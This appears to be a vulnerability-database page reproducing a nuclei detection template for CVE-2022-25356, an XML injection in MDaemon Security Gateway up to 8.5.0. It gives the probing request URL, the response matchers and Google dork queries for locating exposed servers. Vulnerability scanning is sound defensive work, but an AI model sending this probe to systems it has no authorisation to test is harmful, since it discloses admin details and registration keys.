Lucene search
K

Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 44 Views

Alt-n/MDaemon Security Gateway <=8.5.0 XML Injection via SecurityGateway.dll?view=login. Allows attacker to inject arbitrary XML leading to info disclosure & privilege escalation. Upgrade to 8.5.1 or later

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
ALIN MDaemon Security Gateway 安全漏洞
5 Apr 202200:00
cnnvd
CVE
CVE-2022-25356
5 Apr 202201:58
cve
Cvelist
CVE-2022-25356
5 Apr 202201:58
cvelist
NVD
CVE-2022-25356
5 Apr 202202:15
nvd
OSV
CVE-2022-25356
5 Apr 202202:15
osv
Prion
Design/Logic Flaw
5 Apr 202202:15
prion
RedhatCVE
CVE-2022-25356
23 May 202500:05
redhatcve
Vulnrichment
CVE-2022-25356
5 Apr 202201:58
vulnrichment
id: CVE-2022-25356

info:
  name: Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection
  author: Akincibor
  severity: medium
  description: |
    Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious XML code, leading to various security risks such as information disclosure, privilege escalation.
  remediation: |
    Upgrade Alt-n/MDaemon Security Gateway to version 8.5.1 or later to mitigate this vulnerability.
  reference:
    - https://www.swascan.com/security-advisory-alt-n-security-gateway/
    - https://www.altn.com/Products/SecurityGateway-Email-Firewall/
    - https://www.swascan.com/security-blog/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25356
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-25356
    cwe-id: CWE-91
    epss-score: 0.05879
    epss-percentile: 0.92315
    cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: altn
    product: securitygateway
    google-query:
      - inurl:"/SecurityGateway.dll"
      - inurl:"/securitygateway.dll"
  tags: cve,cve2022,altn,gateway,xml,injection,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Exception: Error while [Loading XML"
          - "&lt;RegKey&gt;"
          - "&lt;IsAdmin&gt;"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203e1ec8b644a3e97dee2524b3ea420c74dcb11b594a55f283602343e273c36379022100a69b290cab003b5ed546fa6119e02981976cdf2c016be5ccab961173747c096e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 25
CVSS 3.15.3
EPSS0.05879
SSVC
44